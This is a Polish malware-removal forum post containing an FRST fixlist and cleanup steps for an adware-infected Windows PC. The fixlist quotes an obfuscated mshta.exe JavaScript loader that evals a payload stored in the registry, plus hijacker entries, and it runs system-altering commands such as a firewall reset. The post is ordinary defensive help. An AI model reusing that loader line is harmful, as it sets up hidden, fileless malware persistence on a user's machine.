05.11.2016, 22:02
Do notatnika wklej i zapisz jako fixlist.txt
Zapisany skrypt umieść obok ściągniętego programu FRST
Następnie w programie kliknij Napraw. Po wykonaniu pokaż raport z tego działania.
Odinstaluj:
qualitink 2013.11.07.204414
sweet-page
Update for Zip Opener
Firefox:
Odłącz synchronizację (o ile włączona):
Otwórz menu w górnym rogu po prawej stronie > Otwórz menu pomoc, oznaczone czerwoną ramką.
Informacje dla pomocy technicznej > Odśwież program Firefox. Reset nie naruszy zakładek i haseł.
Google Chrome:
Zresetuj synchronizację (o ile włączona):
Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję "Zresetuj ustawienia przeglądarki".
Ściągnij program
Pokaż raport z tego działania.
Zrób nowe logi i przedstaw z FRST.txt > Addition.txt > Shortcut.txt
Kod:
CloseProcesses:
CreateRestorePoint:
HKLM\...\Run: [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] => 1
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\...\Run: [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] => 1
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\...\Run: [**jpcp<*>] => "C:\Users\Renata\AppData\Local\05d8ce\a1da7e.bat" <===== UWAGA (Nazwa wartości zawiera nieprawidłowe znaki)
HKLM\...\Run: [LogMeIn Hamachi Ui] => "C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2016-11-04] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130976921383745351&GUID=00000000-0000-0000-0000-000000000000
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.pl/
URLSearchHook: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 - (Brak nazwy) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - Brak pliku
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {D06672F0-2324-488A-9AE6-CA873F85F744} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> {B41B764B-285E-49E4-9D0A-31344155BD98} URL = hxxp://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> {BA980BD6-D252-46E6-97AE-D38C0D9FD56A} URL = hxxp://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> {D06672F0-2324-488A-9AE6-CA873F85F744} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
BHO: IE7Pro BHO -> {00011268-E188-40DF-A514-835FCD78B1BF} -> C:\Program Files\IEPro\iepro.dll => Brak pliku
BHO: BitComet Helper -> {39F7E362-828A-4B5A-BCAF-5B79BFDFEA60} -> C:\Program Files\BitComet\tools\BitCometBHO_1.5.4.11.dll => Brak pliku
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll => Brak pliku
BHO: Pomocnik rejestracji usługi Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll => Brak pliku
BHO: Assist Point -> {dc727a8c-7582-483c-a1c2-2b885f099bb5} -> C:\Program Files\Assist Point\Extensions\dc727a8c-7582-483c-a1c2-2b885f099bb5.dll => Brak pliku
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll => Brak pliku
Toolbar: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> Brak nazwy - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - Brak pliku
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_31-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0031-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_31-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_31-windows-i586.cab
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.dosearches.com/?utm_source=b&utm_medium=ild&utm_campaign=rg&utm_content=sc&from=ild&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969&ts=1383866143
CHR StartupUrls: Default -> "hxxp://www.sweet-page.com/?type=hp&ts=1451757252&z=7d6c6d1431717f95b1783bdg5z4w3g5m9wam9o8w1o&from=cor&uid=wdcxwd3200bekt-60v5t1_wd-wxl1a103896938969"
CHR Extension: (Chrome Media Router) - C:\Users\Renata\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-28]
CHR HKLM\...\Chrome\Extension: [lgnbhdnimikkoodkogjlcllngimhlapp] - C:\Program Files\FTDownloader.com\FTDownloader10.crx <nie znaleziono>
CHR HKLM\...\Chrome\Extension: [ljkcijnbckdflhifmbnfnkjacokloacf] - C:\Program Files\qualitink\ljkcijnbckdflhifmbnfnkjacokloacf.crx [2013-11-07]
S4 TSNxGPDService; C:\windows\system32\TSNxGPDService.exe [312680 2009-11-10] (G Data Software)
S2 Hamachi2Svc; "C:\Program Files\LogMeIn Hamachi\hamachi-2.exe" -s [X]
S2 LMIGuardianSvc; "C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe" [X]
S3 MfeAVFK; C:\windows\System32\drivers\MfeAVFK.sys [79816 2009-05-16] (McAfee, Inc.)
S3 MfeBOPK; C:\windows\System32\drivers\MfeBOPK.sys [35272 2009-05-16] (McAfee, Inc.)
R1 mfehidk; C:\windows\System32\drivers\mfehidk.sys [214024 2009-05-16] (McAfee, Inc.)
S3 MfeRKDK; C:\windows\System32\drivers\MfeRKDK.sys [34248 2009-05-16] (McAfee, Inc.)
R1 mfetdik; C:\windows\System32\drivers\mfetdik.sys [55336 2009-05-16] (McAfee, Inc.)
S3 ALSysIO; \??\C:\Users\test\AppData\Local\Temp\ALSysIO.sys [X]
S1 ccnfd_1_10_0_2; system32\drivers\ccnfd_1_10_0_2.sys [X]
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
C:\Users\Renata\AppData\Local\05d8ce
C:\Users\Renata\AppData\Local\TempbG4656.html
C:\Users\Renata\AppData\Local\TempBy3752.html
C:\Users\Renata\AppData\Local\TempDd6076.html
C:\Users\Renata\AppData\Local\Tempja2820.html
C:\Users\Renata\AppData\Local\Tempjb3752.html
C:\Users\Renata\AppData\Local\TempKCZ688.html
C:\Users\Renata\AppData\Local\TempmW2820.html
C:\Users\Renata\AppData\Local\Tempnc4656.html
C:\Users\Renata\AppData\Local\TempuEr688.html
C:\ProgramData\1405543298.bdinstall.bin
C:\ProgramData\1415795312.bdinstall.bin
C:\ProgramData\1415795314.bdinstall.bin
CustomCLSID: HKU\S-1-5-21-2541421654-2607010386-820096111-1001_Classes\CLSID\{08244EE6-92F0-47F2-9FC9-929BAA2E7235}\InprocServer32 -> Brak ścieżki do pliku
CustomCLSID: HKU\S-1-5-21-2541421654-2607010386-820096111-1001_Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32 -> Brak ścieżki do pliku
CustomCLSID: HKU\S-1-5-21-2541421654-2607010386-820096111-1001_Classes\CLSID\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\InprocServer32 -> Brak ścieżki do pliku
Task: {11B71A99-FCC0-426D-9FFD-798544D263F4} - System32\Tasks\{2E38DD82-90C9-412A-ACC3-082002449195} => pcalua.exe -a "H:\z Foxa\APPRMWIN_00017.exe" -d "H:\z Foxa"
Task: {1554A3F6-0869-4DF0-9A55-97E94F5780BD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HPSAObjUtilTask => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\UtilTask.exe [2016-10-18] (Microsoft)
Task: {25F08E32-B789-4A69-AF5C-4369CBF96978} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {321F41E6-547F-4944-B6B5-8756F6A4B1F0} - System32\Tasks\{8C5BB8E0-AF7C-4012-9F56-AB88AA718051} => pcalua.exe -a F:\startuj.exe -d F:\
Task: {3474450C-C8E1-467C-BDA1-046694126CBD} - System32\Tasks\{070E0D1B-2BA9-40B3-8B6B-9D0F4A40720E} => pcalua.exe -a "I:\z Foxa\mflpro\Data\Disk1\setup.exe" -d "I:\z Foxa\mflpro\Data\Disk1"
Task: {451C801C-7211-4112-98B4-4179C3F02351} - System32\Tasks\{8EBDBCA2-B1E7-4042-BCA7-DE622CE2036B} => pcalua.exe -a C:\Users\Renata\Downloads\IE7ProSetup_2.5.1.exe -d C:\Users\Renata\Downloads
Task: {4B061DEB-DC84-4EA2-B5EC-2EE3915B320C} - System32\Tasks\HPCeeScheduleForRenata => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe [2009-10-07] (Hewlett-Packard)
Task: {568BF32F-0A98-4429-BC53-5B525AB615C5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-09-29] (HP Inc.)
Task: {72079696-7308-4925-99D3-12F050917C37} - System32\Tasks\{823CDFA2-3D41-4337-B87D-48601BEA5BED} => pcalua.exe -a "D:\DO ZAINSTALOWANIA\poszło\ImageResizerPowertoySetup.exe" -d "D:\DO ZAINSTALOWANIA\poszło"
Task: {7BC53B2F-D041-4D67-94E4-86F7EE42D962} - System32\Tasks\{0A951D64-852A-4F64-8AC4-BD35CDB371BA} => pcalua.exe -a C:\ProgramData\Uninstall\{537BF16E-7412-448C-95D8-846E85A1D817}\setup.exe -c /x {537BF16E-7412-448C-95D8-846E85A1D817}
Task: {9CF22406-3ED6-4211-869D-4FF50868EC79} - System32\Tasks\{81B9590A-9FD5-47C0-8065-E8FCABECBF93} => D:\gry\AOEII\empires2.exe [2012-09-01] (Microsoft Corporation)
Task: {9EA8E56F-14A1-413D-946F-2C98AA67E753} - System32\Tasks\{6D8A22BE-601E-4634-A63C-F33C5887939B} => pcalua.exe -a "H:\z Foxa\465-INST-WIN7-A\mflpro\Data\Disk1\setup.exe" -d "H:\z Foxa\465-INST-WIN7-A\mflpro\Data\Disk1"
Task: {A95FB6E7-90E0-4107-BD61-F1E33E9A5091} - System32\Tasks\{8F34263A-FC92-4ECB-B6C0-2E616CD31DE0} => D:\gry\AOEII\empires2.exe [2012-09-01] (Microsoft Corporation)
Task: {B7622F1B-81DD-4DCB-AE4C-8D254C9BC5B9} - System32\Tasks\ProtectedSearch\Protected Search => C:\Program Files\Protected Search\ProtectedSearch.exe <==== UWAGA
Task: {BC8CD810-7AF6-47CB-83A3-971028A83763} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)
Task: {BE92A9BD-4980-4C96-A0CC-4F8A94C0AE85} - System32\Tasks\{9F4EBFED-31B5-4FD8-8C9A-173028458AF0} => pcalua.exe -a C:\Users\Renata\Downloads\saSetup64.exe -d C:\Users\Renata\Downloads
Task: {C46943CB-1D1D-49F3-B7D1-29CA156B0467} - System32\Tasks\DSite => C:\Users\Renata\AppData\Roaming\DSite\UpdateProc\UpdateTask.exe [2013-06-16] () <==== UWAGA
Task: {D71ECADE-BA4D-4FCB-88B2-3AA904FA3F7C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {FD3A0AA1-1447-4E64-98F1-45C6FD239F60} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
ShortcutWithArgument: C:\Users\Renata\Desktop\Różne\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
ShortcutWithArgument: C:\Users\Renata\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.dosearches.com/?utm_source=b&utm_medium=ild&utm_campaign=rg&utm_content=sc&from=ild&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969&ts=1383866143
ShortcutWithArgument: C:\Users\Renata\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.dosearches.com/?utm_source=b&utm_medium=ild&utm_campaign=rg&utm_content=sc&from=ild&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969&ts=1383866143
ShortcutWithArgument: C:\Users\Renata\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
ShortcutWithArgument: C:\Users\Renata\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
AlternateDataStreams: C:\Temp:list3 [3799]
AlternateDataStreams: C:\Temp:pid1 [10]
AlternateDataStreams: C:\Temp:pid2 [10]
AlternateDataStreams: C:\Temp:rnd.dat [4]
AlternateDataStreams: C:\Temp:srv [36]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\Software\Classes\47e557: "C:\windows\system32\mshta.exe" "javascript:U2ioQ8="TVpu";ep4=new ActiveXObject("WScript.Shell");n6rkHh="jxURGV4";Bc9xV=ep4.RegRead("HKCU\\software\\uffvge\\yyfwh");duE8d="ub4rK";eval(Bc9xV);MGw4FgeF="12VPKb";" <===== UWAGA
Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f
Hosts:
CMD: netsh advfirewall reset
EmptyTemp:Zapisany skrypt umieść obok ściągniętego programu FRST
Następnie w programie kliknij Napraw. Po wykonaniu pokaż raport z tego działania.
Odinstaluj:
qualitink 2013.11.07.204414
sweet-page
Update for Zip Opener
Firefox:
Odłącz synchronizację (o ile włączona):
[Aby zobaczyć linki, zarejestruj się tutaj]
Menu Historia > Wyczyść całą historię przeglądania.Otwórz menu w górnym rogu po prawej stronie > Otwórz menu pomoc, oznaczone czerwoną ramką.
[Aby zobaczyć linki, zarejestruj się tutaj]
Informacje dla pomocy technicznej > Odśwież program Firefox. Reset nie naruszy zakładek i haseł.
Google Chrome:
Zresetuj synchronizację (o ile włączona):
[Aby zobaczyć linki, zarejestruj się tutaj]
Ustawienia > karta Historia > wyczyśćUstawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję "Zresetuj ustawienia przeglądarki".
Ściągnij program
[Aby zobaczyć linki, zarejestruj się tutaj]
uruchom, kliknij Skanuj i następnie OczyśćPokaż raport z tego działania.
Zrób nowe logi i przedstaw z FRST.txt > Addition.txt > Shortcut.txt